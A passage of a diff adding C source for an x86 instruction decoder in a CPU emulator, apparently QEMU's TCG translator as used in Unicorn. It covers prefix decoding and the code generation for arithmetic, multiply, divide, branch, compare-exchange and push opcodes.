0x4) << 1; + s->rex_x = (b & 0x2) << 2; + REX_B(s) = (b & 0x1) << 3; + tcg_ctx->x86_64_hregs = 1; /* select uniform byte register addressing */ + goto next_byte; + } + break; +#endif + case 0xc5: /* 2-byte VEX */ + case 0xc4: /* 3-byte VEX */ + /* VEX prefixes cannot be used except in 32-bit mode. + Otherwise the instruction is LES or LDS. */ + if (s->code32 && !s->vm86) { + static const int pp_prefix[4] = { + 0, PREFIX_DATA, PREFIX_REPZ, PREFIX_REPNZ + }; + int vex3, vex2 = cpu_ldub_code(env, s->pc); + + if (!CODE64(s) && (vex2 & 0xc0) != 0xc0) { + /* 4.1.4.6: In 32-bit mode, bits [7:6] must be 11b, + otherwise the instruction is LES or LDS. */ + break; + } + s->pc++; + + /* 4.1.1-4.1.3: No preceding lock, 66, f2, f3, or rex prefixes. */ + if (prefixes & (PREFIX_REPZ | PREFIX_REPNZ + | PREFIX_LOCK | PREFIX_DATA)) { + goto illegal_op; + } +#ifdef TARGET_X86_64 + if (tcg_ctx->x86_64_hregs) { + goto illegal_op; + } +#endif + rex_r = (~vex2 >> 4) & 8; + if (b == 0xc5) { + vex3 = vex2; + b = cpu_ldub_code(env, s->pc++) | 0x100; + } else { +#ifdef TARGET_X86_64 + s->rex_x = (~vex2 >> 3) & 8; + s->rex_b = (~vex2 >> 2) & 8; +#endif + vex3 = cpu_ldub_code(env, s->pc++); + rex_w = (vex3 >> 7) & 1; + switch (vex2 & 0x1f) { + case 0x01: /* Implied 0f leading opcode bytes. */ + b = cpu_ldub_code(env, s->pc++) | 0x100; + break; + case 0x02: /* Implied 0f 38 leading opcode bytes. */ + b = 0x138; + break; + case 0x03: /* Implied 0f 3a leading opcode bytes. */ + b = 0x13a; + break; + default: /* Reserved for future use. */ + goto illegal_op; + } + } + s->vex_v = (~vex3 >> 3) & 0xf; + s->vex_l = (vex3 >> 2) & 1; + prefixes |= pp_prefix[vex3 & 3] | PREFIX_VEX; + } + break; + } + + /* Post-process prefixes. */ + if (CODE64(s)) { + /* In 64-bit mode, the default data size is 32-bit. Select 64-bit + data with rex_w, and 16-bit data with 0x66; rex_w takes precedence + over 0x66 if both are present. */ + dflag = (rex_w > 0 ? MO_64 : prefixes & PREFIX_DATA ? MO_16 : MO_32); + /* In 64-bit mode, 0x67 selects 32-bit addressing. */ + aflag = (prefixes & PREFIX_ADR ? MO_32 : MO_64); + } else { + /* In 16/32-bit mode, 0x66 selects the opposite data size. */ + if (s->code32 ^ ((prefixes & PREFIX_DATA) != 0)) { // qq + dflag = MO_32; + } else { + dflag = MO_16; + } + /* In 16/32-bit mode, 0x67 selects the opposite addressing. */ + if (s->code32 ^ ((prefixes & PREFIX_ADR) != 0)) { + aflag = MO_32; + } else { + aflag = MO_16; + } + } + + s->prefix = prefixes; + s->aflag = aflag; + s->dflag = dflag; + + /* lock generation */ + if (prefixes & PREFIX_LOCK) + gen_helper_lock(tcg_ctx, cpu_env); + + /* now check op code */ + reswitch: + switch(b) { + case 0x0f: + /**************************/ + /* extended op code */ + b = cpu_ldub_code(env, s->pc++) | 0x100; + goto reswitch; + + /**************************/ + /* arith & logic */ + case 0x00: case 0x01: case 0x02: case 0x03: case 0x04: case 0x05: //case 0x00 ... 0x05: + case 0x08: case 0x09: case 0x0a: case 0x0b: case 0x0c: case 0x0d: //case 0x08 ... 0x0d: + case 0x10: case 0x11: case 0x12: case 0x13: case 0x14: case 0x15: //case 0x10 ... 0x15: + case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: //case 0x18 ... 0x1d: + case 0x20: case 0x21: case 0x22: case 0x23: case 0x24: case 0x25: //case 0x20 ... 0x25: + case 0x28: case 0x29: case 0x2a: case 0x2b: case 0x2c: case 0x2d: //case 0x28 ... 0x2d: + case 0x30: case 0x31: case 0x32: case 0x33: case 0x34: case 0x35: //case 0x30 ... 0x35: + case 0x38: case 0x39: case 0x3a: case 0x3b: case 0x3c: case 0x3d: //case 0x38 ... 0x3d: + { + int op, f, val; + op = (b >> 3) & 7; + f = (b >> 1) & 3; + + ot = mo_b_d(b, dflag); + + switch(f) { + case 0: /* OP Ev, Gv */ + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + opreg = OR_TMP0; + } else if (op == OP_XORL && rm == reg) { + xor_zero: + /* xor reg, reg optimisation */ + set_cc_op(s, CC_OP_CLR); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + } else { + opreg = rm; + } + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], reg); + gen_op(s, op, ot, opreg); + break; + case 1: /* OP Gv, Ev */ + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + reg = ((modrm >> 3) & 7) | rex_r; + rm = (modrm & 7) | REX_B(s); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + } else if (op == OP_XORL && rm == reg) { + goto xor_zero; + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], rm); + } + gen_op(s, op, ot, reg); + break; + case 2: /* OP A, Iv */ + val = insn_get(env, s, ot); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + gen_op(s, op, ot, OR_EAX); + break; + } + } + break; + + case 0x82: + if (CODE64(s)) + goto illegal_op; + case 0x80: /* GRP1 */ + case 0x81: + case 0x83: + { + int val; + + ot = mo_b_d(b, dflag); + + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + op = (modrm >> 3) & 7; + + if (mod != 3) { + if (b == 0x83) + s->rip_offset = 1; + else + s->rip_offset = insn_const_size(ot); + gen_lea_modrm(env, s, modrm); + opreg = OR_TMP0; + } else { + opreg = rm; + } + + switch(b) { + default: + case 0x80: + case 0x81: + case 0x82: + val = insn_get(env, s, ot); + break; + case 0x83: + val = (int8_t)insn_get(env, s, MO_8); + break; + } + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + gen_op(s, op, ot, opreg); + } + break; + + /**************************/ + /* inc, dec, and other misc arith */ + case 0x40: case 0x41: case 0x42: case 0x43: + case 0x44: case 0x45: case 0x46: case 0x47: //case 0x40 ... 0x47: /* inc Gv */ + ot = dflag; + gen_inc(s, ot, OR_EAX + (b & 7), 1); + break; + case 0x48: case 0x49: case 0x4a: case 0x4b: + case 0x4c: case 0x4d: case 0x4e: case 0x4f: //case 0x48 ... 0x4f: /* dec Gv */ + ot = dflag; + gen_inc(s, ot, OR_EAX + (b & 7), -1); + break; + case 0xf6: /* GRP3 */ + case 0xf7: + ot = mo_b_d(b, dflag); + + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + op = (modrm >> 3) & 7; + if (mod != 3) { + if (op == 0) + s->rip_offset = insn_const_size(ot); + gen_lea_modrm(env, s, modrm); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + } + + switch(op) { + case 0: /* test */ + val = insn_get(env, s, ot); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + gen_op_testl_T0_T1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + case 2: /* not */ + tcg_gen_not_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + if (mod != 3) { + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + break; + case 3: /* neg */ + tcg_gen_neg_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + if (mod != 3) { + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } + gen_op_update_neg_cc(tcg_ctx); + set_cc_op(s, CC_OP_SUBB + ot); + break; + case 4: /* mul */ + switch(ot) { + case MO_8: + gen_op_mov_v_reg(tcg_ctx, MO_8, *cpu_T[1], R_EAX); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_andi_tl(tcg_ctx, cpu_cc_src, *cpu_T[0], 0xff00); + set_cc_op(s, CC_OP_MULB); + break; + case MO_16: + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[1], R_EAX); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_shri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 16); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EDX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[0]); + set_cc_op(s, CC_OP_MULW); + break; + default: + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_regs[R_EAX]); + tcg_gen_mulu2_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp3_i32, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[R_EAX], cpu_tmp2_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[R_EDX], cpu_tmp3_i32); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[R_EAX]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_regs[R_EDX]); + set_cc_op(s, CC_OP_MULL); + break; +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_mulu2_i64(tcg_ctx, *cpu_regs[R_EAX], *cpu_regs[R_EDX], + *cpu_T[0], *cpu_regs[R_EAX]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[R_EAX]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_regs[R_EDX]); + set_cc_op(s, CC_OP_MULQ); + break; +#endif + } + break; + case 5: /* imul */ + switch(ot) { + case MO_8: + gen_op_mov_v_reg(tcg_ctx, MO_8, *cpu_T[1], R_EAX); + tcg_gen_ext8s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext8s_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_ext8s_tl(tcg_ctx, cpu_tmp0, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, *cpu_T[0], cpu_tmp0); + set_cc_op(s, CC_OP_MULB); + break; + case MO_16: + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[1], R_EAX); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_ext16s_tl(tcg_ctx, cpu_tmp0, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, *cpu_T[0], cpu_tmp0); + tcg_gen_shri_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 16); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EDX, *cpu_T[0]); + set_cc_op(s, CC_OP_MULW); + break; + default: + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_regs[R_EAX]); + tcg_gen_muls2_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp3_i32, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[R_EAX], cpu_tmp2_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[R_EDX], cpu_tmp3_i32); + tcg_gen_sari_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, 31); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[R_EAX]); + tcg_gen_sub_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, cpu_cc_src, cpu_tmp2_i32); + set_cc_op(s, CC_OP_MULL); + break; +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_muls2_i64(tcg_ctx, *cpu_regs[R_EAX], *cpu_regs[R_EDX], + *cpu_T[0], *cpu_regs[R_EAX]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[R_EAX]); + tcg_gen_sari_tl(tcg_ctx, cpu_cc_src, *cpu_regs[R_EAX], 63); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, *cpu_regs[R_EDX]); + set_cc_op(s, CC_OP_MULQ); + break; +#endif + } + break; + case 6: /* div */ + switch(ot) { + case MO_8: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_divb_AL(tcg_ctx, cpu_env, *cpu_T[0]); + break; + case MO_16: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_divw_AX(tcg_ctx, cpu_env, *cpu_T[0]); + break; + default: + case MO_32: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_divl_EAX(tcg_ctx, cpu_env, *cpu_T[0]); + break; +#ifdef TARGET_X86_64 + case MO_64: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_divq_EAX(tcg_ctx, cpu_env, *cpu_T[0]); + break; +#endif + } + break; + case 7: /* idiv */ + switch(ot) { + case MO_8: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_idivb_AL(tcg_ctx, cpu_env, *cpu_T[0]); + break; + case MO_16: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_idivw_AX(tcg_ctx, cpu_env, *cpu_T[0]); + break; + default: + case MO_32: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_idivl_EAX(tcg_ctx, cpu_env, *cpu_T[0]); + break; +#ifdef TARGET_X86_64 + case MO_64: + gen_jmp_im(s, pc_start - s->cs_base); + gen_helper_idivq_EAX(tcg_ctx, cpu_env, *cpu_T[0]); + break; +#endif + } + break; + default: + goto illegal_op; + } + break; + + case 0xfe: /* GRP4 */ + case 0xff: /* GRP5 */ + ot = mo_b_d(b, dflag); + + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + rm = (modrm & 7) | REX_B(s); + op = (modrm >> 3) & 7; + if (op >= 2 && b == 0xfe) { + goto illegal_op; + } + if (CODE64(s)) { + if (op == 2 || op == 4) { + /* operand size for jumps is 64 bit */ + ot = MO_64; + } else if (op == 3 || op == 5) { + ot = dflag != MO_16 ? MO_32 + (rex_w == 1) : MO_16; + } else if (op == 6) { + /* default push size is 64 bit */ + ot = mo_pushpop(s, dflag); + } + } + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + if (op >= 2 && op != 3 && op != 5) + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], rm); + } + + switch(op) { + case 0: /* inc Ev */ + if (mod != 3) + opreg = OR_TMP0; + else + opreg = rm; + gen_inc(s, ot, opreg, 1); + break; + case 1: /* dec Ev */ + if (mod != 3) + opreg = OR_TMP0; + else + opreg = rm; + gen_inc(s, ot, opreg, -1); + break; + case 2: /* call Ev */ + /* XXX: optimize if memory (no 'and' is necessary) */ + if (dflag == MO_16) { + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + next_eip = s->pc - s->cs_base; + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], next_eip); + gen_push_v(s, *cpu_T[1]); + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + gen_eob(s); + break; + case 3: /* lcall Ev */ + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_add_A0_im(s, 1 << ot); + gen_op_ld_v(s, MO_16, *cpu_T[0], cpu_A0); + do_lcall: + if (s->pe && !s->vm86) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_lcall_protected(tcg_ctx, cpu_env, cpu_tmp2_i32, *cpu_T[1], + tcg_const_i32(tcg_ctx, dflag - 1), + tcg_const_i32(tcg_ctx, s->pc - pc_start)); + } else { + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_lcall_real(tcg_ctx, cpu_env, cpu_tmp2_i32, *cpu_T[1], + tcg_const_i32(tcg_ctx, dflag - 1), + tcg_const_i32(tcg_ctx, s->pc - s->cs_base)); + } + gen_eob(s); + break; + case 4: /* jmp Ev */ + if (dflag == MO_16) { + tcg_gen_ext16u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + gen_op_jmp_v(tcg_ctx, *cpu_T[0]); + gen_eob(s); + break; + case 5: /* ljmp Ev */ + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_add_A0_im(s, 1 << ot); + gen_op_ld_v(s, MO_16, *cpu_T[0], cpu_A0); + do_ljmp: + if (s->pe && !s->vm86) { + gen_update_cc_op(s); + gen_jmp_im(s, pc_start - s->cs_base); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + gen_helper_ljmp_protected(tcg_ctx, cpu_env, cpu_tmp2_i32, *cpu_T[1], + tcg_const_i32(tcg_ctx, s->pc - pc_start)); + } else { + gen_op_movl_seg_T0_vm(tcg_ctx, R_CS); + gen_op_jmp_v(tcg_ctx, *cpu_T[1]); + } + gen_eob(s); + break; + case 6: /* push Ev */ + gen_push_v(s, *cpu_T[0]); + break; + default: + goto illegal_op; + } + break; + + case 0x84: /* test Ev, Gv */ + case 0x85: + ot = mo_b_d(b, dflag); + + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], reg); + gen_op_testl_T0_T1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + + case 0xa8: /* test eAX, Iv */ + case 0xa9: + ot = mo_b_d(b, dflag); + val = insn_get(env, s, ot); + + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], OR_EAX); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + gen_op_testl_T0_T1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + + case 0x98: /* CWDE/CBW */ + switch (dflag) { +#ifdef TARGET_X86_64 + case MO_64: + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EAX); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_64, R_EAX, *cpu_T[0]); + break; +#endif + case MO_32: + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[0], R_EAX); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_32, R_EAX, *cpu_T[0]); + break; + case MO_16: + gen_op_mov_v_reg(tcg_ctx, MO_8, *cpu_T[0], R_EAX); + tcg_gen_ext8s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EAX, *cpu_T[0]); + break; + default: + tcg_abort(); + } + break; + case 0x99: /* CDQ/CWD */ + switch (dflag) { +#ifdef TARGET_X86_64 + case MO_64: + gen_op_mov_v_reg(tcg_ctx, MO_64, *cpu_T[0], R_EAX); + tcg_gen_sari_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 63); + gen_op_mov_reg_v(tcg_ctx, MO_64, R_EDX, *cpu_T[0]); + break; +#endif + case MO_32: + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EAX); + tcg_gen_ext32s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_sari_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 31); + gen_op_mov_reg_v(tcg_ctx, MO_32, R_EDX, *cpu_T[0]); + break; + case MO_16: + gen_op_mov_v_reg(tcg_ctx, MO_16, *cpu_T[0], R_EAX); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_sari_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 15); + gen_op_mov_reg_v(tcg_ctx, MO_16, R_EDX, *cpu_T[0]); + break; + default: + tcg_abort(); + } + break; + case 0x1af: /* imul Gv, Ev */ + case 0x69: /* imul Gv, Ev, I */ + case 0x6b: + ot = dflag; + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + if (b == 0x69) + s->rip_offset = insn_const_size(ot); + else if (b == 0x6b) + s->rip_offset = 1; + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + if (b == 0x69) { + val = insn_get(env, s, ot); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + } else if (b == 0x6b) { + val = (int8_t)insn_get(env, s, MO_8); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], val); + } else { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], reg); + } + switch (ot) { +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_muls2_i64(tcg_ctx, *cpu_regs[reg], *cpu_T[1], *cpu_T[0], *cpu_T[1]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[reg]); + tcg_gen_sari_tl(tcg_ctx, cpu_cc_src, cpu_cc_dst, 63); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, cpu_cc_src, *cpu_T[1]); + break; +#endif + case MO_32: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[1]); + tcg_gen_muls2_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp3_i32, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp2_i32); + tcg_gen_sari_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, 31); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_regs[reg]); + tcg_gen_sub_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, cpu_cc_src, cpu_tmp2_i32); + break; + default: + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_ext16s_tl(tcg_ctx, *cpu_T[1], *cpu_T[1]); + /* XXX: use 32 bit mul which could be faster */ + tcg_gen_mul_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + tcg_gen_ext16s_tl(tcg_ctx, cpu_tmp0, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_src, *cpu_T[0], cpu_tmp0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + } + set_cc_op(s, CC_OP_MULB + ot); + break; + case 0x1c0: + case 0x1c1: /* xadd Ev, Gv */ + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (mod == 3) { + rm = (modrm & 7) | REX_B(s); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[1], rm); + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + gen_lea_modrm(env, s, modrm); + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], reg); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[1]); + } + gen_op_update2_cc(tcg_ctx); + set_cc_op(s, CC_OP_ADDB + ot); + break; + case 0x1b0: + case 0x1b1: /* cmpxchg Ev, Gv */ + { + int label1, label2; + TCGv t0, t1, t2, a0; + + ot = mo_b_d(b, dflag); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + t0 = tcg_temp_local_new(tcg_ctx); + t1 = tcg_temp_local_new(tcg_ctx); + t2 = tcg_temp_local_new(tcg_ctx); + a0 = tcg_temp_local_new(tcg_ctx); + gen_op_mov_v_reg(tcg_ctx, ot, t1, reg); + if (mod == 3) { + rm = (modrm & 7) | REX_B(s); + gen_op_mov_v_reg(tcg_ctx, ot, t0, rm); + } else { + gen_lea_modrm(env, s, modrm); + tcg_gen_mov_tl(tcg_ctx, a0, cpu_A0); + gen_op_ld_v(s, ot, t0, a0); + rm = 0; /* avoid warning */ + } + label1 = gen_new_label(tcg_ctx); + tcg_gen_mov_tl(tcg_ctx, t2, *cpu_regs[R_EAX]); + gen_extu(tcg_ctx, ot, t0); + gen_extu(tcg_ctx, ot, t2); + tcg_gen_brcond_tl(tcg_ctx, TCG_COND_EQ, t2, t0, label1); + label2 = gen_new_label(tcg_ctx); + if (mod == 3) { + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, t0); + tcg_gen_br(tcg_ctx, label2); + gen_set_label(tcg_ctx, label1); + gen_op_mov_reg_v(tcg_ctx, ot, rm, t1); + } else { + /* perform no-op store cycle like physical cpu; must be + before changing accumulator to ensure idempotency if + the store faults and the instruction is restarted */ + gen_op_st_v(s, ot, t0, a0); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, t0); + tcg_gen_br(tcg_ctx, label2); + gen_set_label(tcg_ctx, label1); + gen_op_st_v(s, ot, t1, a0); + } + gen_set_label(tcg_ctx, label2); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, t0); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_srcT, t2); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_dst, t2, t0); + set_cc_op(s, CC_OP_SUBB + ot); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + tcg_temp_free(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, a0); + } + break; + case 0x1c7: /* cmpxchg8b */ + modrm = cpu_ldub_code(env, s->pc++); + mod = (modrm >> 6) & 3; + if ((mod == 3) || ((modrm & 0x38) != 0x8)) + goto illegal_op; +#ifdef TARGET_X86_64 + if (dflag == MO_64) { + if (!(s->cpuid_ext_features & CPUID_EXT_CX16)) + goto illegal_op; + gen_jmp_im(s, pc_start - s->cs_base); + gen_update_cc_op(s); + gen_lea_modrm(env, s, modrm); + gen_helper_cmpxchg16b(tcg_ctx, cpu_env, cpu_A0); + } else +#endif + { + if (!(s->cpuid_features & CPUID_CX8)) + goto illegal_op; + gen_jmp_im(s, pc_start - s->cs_base); + gen_update_cc_op(s); + gen_lea_modrm(env, s, modrm); + gen_helper_cmpxchg8b(tcg_ctx, cpu_env, cpu_A0); + } + set_cc_op(s, CC_OP_EFLAGS); + break; + + /**************************/ + /* push/pop */ + case 0x50: case 0x51: case 0x52: case 0x53: + case 0x54: case 0x55: case 0x56: case 0x57: //case 0x50 ... 0x57: /* push */ + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], (b & 7) | REX_B(s)); + gen_push_v(s, *cpu_T[0]); + break; + case 0x58: case 0x59: case 0x5a: case 0x5b: + case 0x5c: case 0x5d: case 0x5e: case 0x5f: 